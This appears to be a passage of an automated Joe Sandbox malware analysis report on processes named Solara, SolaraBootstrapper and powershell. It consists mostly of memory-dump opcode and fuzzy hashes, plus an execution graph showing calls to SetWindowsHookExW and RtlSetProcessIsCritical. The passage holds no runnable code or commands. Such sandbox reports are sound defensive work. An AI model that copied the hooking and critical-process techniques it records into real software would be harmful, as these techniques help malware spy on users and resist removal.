                                                                • Instruction Fuzzy Hash: 4CF0F976600600AFD720CF0AD985C23FBADEBD4670759C56AEC5A8B751C771EC42CEA0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 25462bd089b0eed1a097f8599fbfa245eb4aed2deae3602d1ac9dee46e39a909
                                                                • Instruction ID: 525345d791885f24645774b70fac98356824e55ee69be701b37d56892f96871f
                                                                • Opcode Fuzzy Hash: 25462bd089b0eed1a097f8599fbfa245eb4aed2deae3602d1ac9dee46e39a909
                                                                • Instruction Fuzzy Hash: BBF082397051404FC3108F1DE454CA6BBFAEFCA614319009AE585CB732DA61DC12CB91
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c80ebcaa9bf8027e48dc107a423c33ea3feb48123afcd4c934e14961a1c0b8f2
                                                                • Instruction ID: 4c523066bbbca9c7dcfb71814d1b0caca54089b76cf5c9f8f042c1b5adfef719
                                                                • Opcode Fuzzy Hash: c80ebcaa9bf8027e48dc107a423c33ea3feb48123afcd4c934e14961a1c0b8f2
                                                                • Instruction Fuzzy Hash: 08F082B5A053004FD7609F79D8993EABFE5FF01310F21446AE14EC7241DB3968868BA2
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd14348cc27144685fe0094d6f5690d4e9f16f9e42d0931592c5cd34904cbb52
                                                                • Instruction ID: 800f0f66d6a5aee9fa659f7ee45fc811cab5a0be48cdfd2a3919f1ea56193e67
                                                                • Opcode Fuzzy Hash: bd14348cc27144685fe0094d6f5690d4e9f16f9e42d0931592c5cd34904cbb52
                                                                • Instruction Fuzzy Hash: 6FF0F976100780AFD725CF06C985D23BBB9EB85624B198499FC5A9B352C731FC42CF60
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6e24a249bc2476938fa0ac62a730d333e0baf115d05889f383ed7bc57086020
                                                                • Instruction ID: 3bf7c48e40e5b14422669839414d840acde184c78f932c7f06342365c51c3656
                                                                • Opcode Fuzzy Hash: f6e24a249bc2476938fa0ac62a730d333e0baf115d05889f383ed7bc57086020
                                                                • Instruction Fuzzy Hash: 5201E472D0074ADBCB04CFE4C8446EDFBB0FF99300F10072AE016A6600EBB06686CB90
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75bd4ca00bca4491d431ccdd27de5eea832b4f013435ba052c23c9727550b5db
                                                                • Instruction ID: 4460535248b026ae7f49886b15dec78d27a2350f9e437f7e4e9d9505c9a0d0c4
                                                                • Opcode Fuzzy Hash: 75bd4ca00bca4491d431ccdd27de5eea832b4f013435ba052c23c9727550b5db
                                                                • Instruction Fuzzy Hash: 53F0A0367007189FC710AA6AEC44A6FB7E9EB88665B00092DE50AD3751DF34AC4287A4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55ea93c4ad5455f134a10e51f2d15ab362247e214655e7d07475b3f56e5b21f4
                                                                • Instruction ID: c9e7a74fc3dc5f06d4ca244f0845c313b7dab10e44027f628050e3ab765147a3
                                                                • Opcode Fuzzy Hash: 55ea93c4ad5455f134a10e51f2d15ab362247e214655e7d07475b3f56e5b21f4
                                                                • Instruction Fuzzy Hash: FDF0A73530C3505BCB0A2776A8193ED3F95AFC5724F05016BD90587241DE6D5D0683EA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c939f84a03088e88449c3f08c4011b755b24254e821447d421f094dfba2b3eb5
                                                                • Instruction ID: 969054ac49570d050dcb9ff34bc1817154f18e6a09b95e70b60d7725e368605d
                                                                • Opcode Fuzzy Hash: c939f84a03088e88449c3f08c4011b755b24254e821447d421f094dfba2b3eb5
                                                                • Instruction Fuzzy Hash: 1CF0A0797005048FCB10EB7DE840B9A7BE2EBC8655B154169E80ACF324DB76DC068B91
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2cc43617504e216f6f6e99bba116f80d9dd29a4a73e6a8bcbd774c7af5c1315
                                                                • Instruction ID: 38ec1eb08752e4c700ac616fdd78a13b24eca6aa4b39a39431f75eba8fd439dd
                                                                • Opcode Fuzzy Hash: f2cc43617504e216f6f6e99bba116f80d9dd29a4a73e6a8bcbd774c7af5c1315
                                                                • Instruction Fuzzy Hash: 8FF027357002045BE314BB64C0143ABB796DFC0769F10813ED90A4B384CE3D6802C7E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5db0f0250a86199baa1b44c28d481607e3cad173f1d49f77fef8f5fd0f7d660
                                                                • Instruction ID: 17b598618264c0f7f217564f279a983c1a2a14690e0191e820aea6b20cc52ce0
                                                                • Opcode Fuzzy Hash: b5db0f0250a86199baa1b44c28d481607e3cad173f1d49f77fef8f5fd0f7d660
                                                                • Instruction Fuzzy Hash: 6BE065357001008F83009B1ED488C66B7FAEFDE72531900AAE54ACB330CA21EC02CB80
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f43806339079823913c42595ef0095caa709b2006b11a2edfda70f9f6c0ec6a
                                                                • Instruction ID: 4cdc1e6e11265ecb504817ecf43fcba11c1702c64af577643f3b584f7a39a9fc
                                                                • Opcode Fuzzy Hash: 8f43806339079823913c42595ef0095caa709b2006b11a2edfda70f9f6c0ec6a
                                                                • Instruction Fuzzy Hash: D1E02662B083D5078B1A813DAC140AABFAB8FC312032A81FBE141CB342EC16980343E2
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76ab426ef3509f93b472eb1ab74f9788336251ca477206d3e8b159c1cd256e52
                                                                • Instruction ID: 276bd6151f3b95fec25d310057fdda08ba9f324b44520ec5f3d26c478c00c26e
                                                                • Opcode Fuzzy Hash: 76ab426ef3509f93b472eb1ab74f9788336251ca477206d3e8b159c1cd256e52
                                                                • Instruction Fuzzy Hash: 93D01222B0312517556871B91C007F7BACFCAC44E5B05013ADA07C7641EC90EC1743F1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e00d3a681a7c4b823691b0e046cd1448dffa6477f7139e47d5d1ba3539fa697
                                                                • Instruction ID: 6542edaa4924cccc0a3ce46fa9969142221a0b797a514a974e6cbd621523c1ae
                                                                • Opcode Fuzzy Hash: 1e00d3a681a7c4b823691b0e046cd1448dffa6477f7139e47d5d1ba3539fa697
                                                                • Instruction Fuzzy Hash: 76F06D709003044BD360DF78D89C79ABBE5FB44310F10446AE54EC7340DB39A8818B90
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a8fc61e124230c58f48fb3a01c79f1a50307fdbf2574a69acd35f1b47682252
                                                                • Instruction ID: 27df25e591ae2ba95dce6ca3b13773f84c1d1f6ebd49a3e30a17cd11398280d1
                                                                • Opcode Fuzzy Hash: 8a8fc61e124230c58f48fb3a01c79f1a50307fdbf2574a69acd35f1b47682252
                                                                • Instruction Fuzzy Hash: 11E01A71D00209AF8B40EFB898426AEFBF4AB49200B10C5AE8919D7301EA3296129BD1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1988914acce7dd7220fe809a08a2fdf6e1870f5ec19396572b901d98d6bbec0f
                                                                • Instruction ID: 63554e3a2325626b1571f9c82e55c0a2fce9e48b422c905670c0e64a0b2354d5
                                                                • Opcode Fuzzy Hash: 1988914acce7dd7220fe809a08a2fdf6e1870f5ec19396572b901d98d6bbec0f
                                                                • Instruction Fuzzy Hash: 5BE086357046145BCB097775A81C3AE7B56FBC4765F04002AE60A87340CF7D5D1283ED
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88937c4961d20c9177df31be872670854d19b1169353f623219e048186266ec4
                                                                • Instruction ID: 5ae8366cec5ef1ca6600f8718d18b92920e0e54e710732c3e90c9e1d54cc3d8c
                                                                • Opcode Fuzzy Hash: 88937c4961d20c9177df31be872670854d19b1169353f623219e048186266ec4
                                                                • Instruction Fuzzy Hash: 52D09E52B4322517566475BA1D10BBBB5CFCAC54E5B05013ADA0BC7642ED94EC1743F1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd

                                                                Execution Graph

                                                                Execution Coverage:18.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:11
                                                                Total number of Limit Nodes:1
                                                                execution_graph 5338 7ffd9b693658 5339 7ffd9b693661 SetWindowsHookExW 5338->5339 5341 7ffd9b693731 5339->5341 5351 7ffd9b6914fa 5352 7ffd9b691505 RtlSetProcessIsCritical 5351->5352 5354 7ffd9b6931f2 5352->5354 5346 7ffd9b69149f 5348 7ffd9b6914cd 5346->5348 5347 7ffd9b6914db 5348->5347 5349 7ffd9b693191 RtlSetProcessIsCritical 5348->5349 5350 7ffd9b6931f2 5349->5350

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2928671241.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID: PJ]I
                                                                • API String ID: 2695349919-2538668677


                                                                Control-flow Graph

                                                                control_flow_graph 421 7ffd9b693658-7ffd9b69365f 422 7ffd9b69366a-7ffd9b6936dd 421->422 423 7ffd9b693661-7ffd9b693669 421->423 427 7ffd9b693769-7ffd9b69376d 422->427 428 7ffd9b6936e3-7ffd9b6936f0 422->428 423->422 429 7ffd9b6936f2-7ffd9b69372f SetWindowsHookExW 427->429 428->429 431 7ffd9b693737-7ffd9b693768 429->431 432 7ffd9b693731 429->432 432->431
                                                                Similarity
                                                                • API ID: HookWindows
                                                                • String ID:
                                                                • API String ID: 2559412058-0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db8706a3ce7b940c301f416c022480c75a45af4780b7b8b7b0da7b7c29570c5a
                                                                • Instruction ID: ce71cfd9f801a258f26a9fdb6a913b8d19ccf6fcf636df355344896cfe4d1367
                                                                • Opcode Fuzzy Hash: db8706a3ce7b940c301f416c022480c75a45af4780b7b8b7b0da7b7c29570c5a
                                                                • Instruction Fuzzy Hash: 9BE11671D1022ACFDB28DF66D984BDDBBB2FB89300F1095AA9449A7358DB305E85CF50
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92df8ea92e6ce0bc23c010cdd28462ce3f114f3f14ff81eecf47a3b01c13f7d2
                                                                • Instruction ID: 69ec8b85f7de1890c6a658b455224d3c9d5ae2014b6a72355922ed3f88d07ce0
                                                                • Opcode Fuzzy Hash: 92df8ea92e6ce0bc23c010cdd28462ce3f114f3f14ff81eecf47a3b01c13f7d2
                                                                • Instruction Fuzzy Hash: 11014634D1834AEFCB05EFB8E454A99BFB0EF4A300F2084AAD84497322EB345A41CB40
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49e06d941f69791cde25409ab5c92878584c3bb621a3c0c52f35c34d97f527c9
                                                                • Instruction ID: 885b7a931f0de3c440b0bf82b162000c7f3faf1c5b4017013bdb8b19cfbbc250
                                                                • Opcode Fuzzy Hash: 49e06d941f69791cde25409ab5c92878584c3bb621a3c0c52f35c34d97f527c9
                                                                • Instruction Fuzzy Hash: 2C41E574E11209DFDB58DFA9D880ADDBBB2BF89304F50852DE404A7358DB749846CF51
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f58c04a48cec798b798c8ce8f18cf24f4e6c8117fdb6349d224bc1161b5dde0
                                                                • Instruction ID: b06855fe9135844158841fe5ea9a1db2715f189108bffdb5df5ead0570aa764c
                                                                • Opcode Fuzzy Hash: 1f58c04a48cec798b798c8ce8f18cf24f4e6c8117fdb6349d224bc1161b5dde0
                                                                • Instruction Fuzzy Hash: 25211575E01209CFDB08DFA9D554AEEBBB2AF89304F20946AE801B7364DB319D40CF64
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90a28a8e5386eb5bc4befcc2c082e02880cbded4427f1a6c07afaedea6642a32
                                                                • Instruction ID: 312df6d673543b5cbb0345fc8606e8c0b09e1388f6ef2548dd50492d02741d51
                                                                • Opcode Fuzzy Hash: 90a28a8e5386eb5bc4befcc2c082e02880cbded4427f1a6c07afaedea6642a32
                                                                • Instruction Fuzzy Hash: 6F21D675E01209DFDB08DFA9D554ADEBBF2AF89304F20946AE801B7364DB355D40CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54a031a1845f41d185193908701c4432c5a293ba159ab27bf09409277a970e35
                                                                • Instruction ID: 1a09d619e019dfae3b16b4433bd4ec822b9cf5040fb1c51d7edef4378ff923fe
                                                                • Opcode Fuzzy Hash: 54a031a1845f41d185193908701c4432c5a293ba159ab27bf09409277a970e35
                                                                • Instruction Fuzzy Hash: 26F0657150634ADFC701DFA8E906A8DBB74EF06304F4045E9E505DB366DB302E44D765
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1771732737.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1310000_SolaraBootstrapper.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cf0fa4ffb186401fb78dfb434938eb884158e1b1fdef25eeb62ca3a7cbcd4e27
                                                                • Instruction ID: 6d0569608172bd4ca77c89244fbde36c8d1335d5c7cf375aff2092cce5f95bd2
                                                                • Opcode Fuzzy Hash: cf0fa4ffb186401fb78dfb434938eb884158e1b1fdef25eeb62ca3a7cbcd4e27
                                                                • Instruction Fuzzy Hash: 88E04F7050120AEFC704EFA8E906E9DB7B4EB00304F8046A8E40597354DB302E4497A1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3d2efbe7c351e3af95e59537e66bc3ab669defd63cc2870eb0f4a103f42f624
                                                                • Instruction ID: 35ac5af377325b2791dbb4f536291a1362a386ea33812e40f12d3800fc993562
                                                                • Opcode Fuzzy Hash: b3d2efbe7c351e3af95e59537e66bc3ab669defd63cc2870eb0f4a103f42f624
                                                                • Instruction Fuzzy Hash: 2AD18E31A08A4D8FDF94DF5CC464AE9BBE1FF68340F15416AD419DB2A6CA34F881CB81
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5348f763bd9638d092818e2422ac9dedc9251a73bb2bec0461256dde89de273
                                                                • Instruction ID: 0503c0fab13ace5b1787f80df8dd19004ec9f3ee46ad723818beb72882b3cbfc
                                                                • Opcode Fuzzy Hash: a5348f763bd9638d092818e2422ac9dedc9251a73bb2bec0461256dde89de273
                                                                • Instruction Fuzzy Hash: C6C14772B0EB8E8FEBA5ABA898655B57B91EF51310F4902BED44DC70F7D914E801C342
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1897938027.00007FFD9B57D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B57D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b57d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 31d9393e942528b0a2824dda2d8399418faac303de3e27d39c1676a31a00ade1
                                                                • Instruction ID: c63b96c5edf1ee7bd0ca12d252e1ef6ad9d6601f1630da48bb2296052d781ecb
                                                                • Opcode Fuzzy Hash: 31d9393e942528b0a2824dda2d8399418faac303de3e27d39c1676a31a00ade1
                                                                • Instruction Fuzzy Hash: B041267150EBC84FE7A78B289895A523FF4EF52314B1641EFD088CB1A3D625B846C792
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8272dfaf580b5d7a076f35dfc6281e30570d36f8dd5f1349b770b284f47bb22
                                                                • Instruction ID: d1e8663a1372940b580f69401682c29447d56f2ea1c73ea66655fe579f64d9f3
                                                                • Opcode Fuzzy Hash: c8272dfaf580b5d7a076f35dfc6281e30570d36f8dd5f1349b770b284f47bb22
                                                                • Instruction Fuzzy Hash: E631B53091CB4C8FDB5C9B4C984A6A977E0FB99711F00422FE449D3251CA70B8558BC2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51896acb6c46fee603b7e5a6a8468f1145ab18ecb42eb11be7d208b90a9bf79f
                                                                • Instruction ID: 714188f53056d4037cccbb35e2eba67456c72971fe2337380e9048c4c624df8c
                                                                • Opcode Fuzzy Hash: 51896acb6c46fee603b7e5a6a8468f1145ab18ecb42eb11be7d208b90a9bf79f
                                                                • Instruction Fuzzy Hash: 3F21283090DB4C4FDB59DFAC984A7E97FF0EB96321F04416BD049C7192DA74A44ACB91
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d93c7d16004b425968addcfb3a0d039c20d6f041265843e3879c19b4e7f67be
                                                                • Instruction ID: a1606f27666634070c643f15eebef5342f964b0ae836284cab7d5780aeecc835
                                                                • Opcode Fuzzy Hash: 2d93c7d16004b425968addcfb3a0d039c20d6f041265843e3879c19b4e7f67be
                                                                • Instruction Fuzzy Hash: 92310B7690E68A4FD715AFAC9C724E57BE0FF2122870D02F7C0A8CE163FD1515468742
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction ID: 1b5accfc9599bf43c69ba9d6bd2a67115dc506e1efe0f693a81a39f3d74253e9
                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction Fuzzy Hash: B201A73020CB0C4FDB48EF0CE051AA5B3E0FB89324F10056DE58AC36A1DA32E882CB41
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb8bfd5e5f4c018249b0f0593d6cfddd4cd86d91d0000ded759e5383caa43c6c
                                                                • Instruction ID: 1fcf005d3356e901b4c45c193da9439ce95c501228e3f975c908073790ffb8d6
                                                                • Opcode Fuzzy Hash: eb8bfd5e5f4c018249b0f0593d6cfddd4cd86d91d0000ded759e5383caa43c6c
                                                                • Instruction Fuzzy Hash: 09F0BE32B0E6498FD768EB8CE4528E873E0EF55320B1201BAE06DC71B3CA25EC40C742
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce412540b603d3b836f16cf15b3269fa9d8eb43854e3ba2dcd7436bf3c7c6cf9
                                                                • Instruction ID: 0a1d5f0416fcb392d7fcce1aca68181f5781a9644b99c4d07cbd337be46225a8
                                                                • Opcode Fuzzy Hash: ce412540b603d3b836f16cf15b3269fa9d8eb43854e3ba2dcd7436bf3c7c6cf9
                                                                • Instruction Fuzzy Hash: 74F0BE32B0E6498FD765EB4CE0668E87BE0FF0532074200BAE05DCB0B3CA26AC40C741
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1899116245.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: c6045f471de93fd1282ca3adbf8d1de1fbb49414070c6d2fea6aaaf07c9ecea7
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: 85E01A31B0C908DFDA78DA4CE0519E973E1EB98321B1202BBD14EC7571CA22ED518B81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.1898487751.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
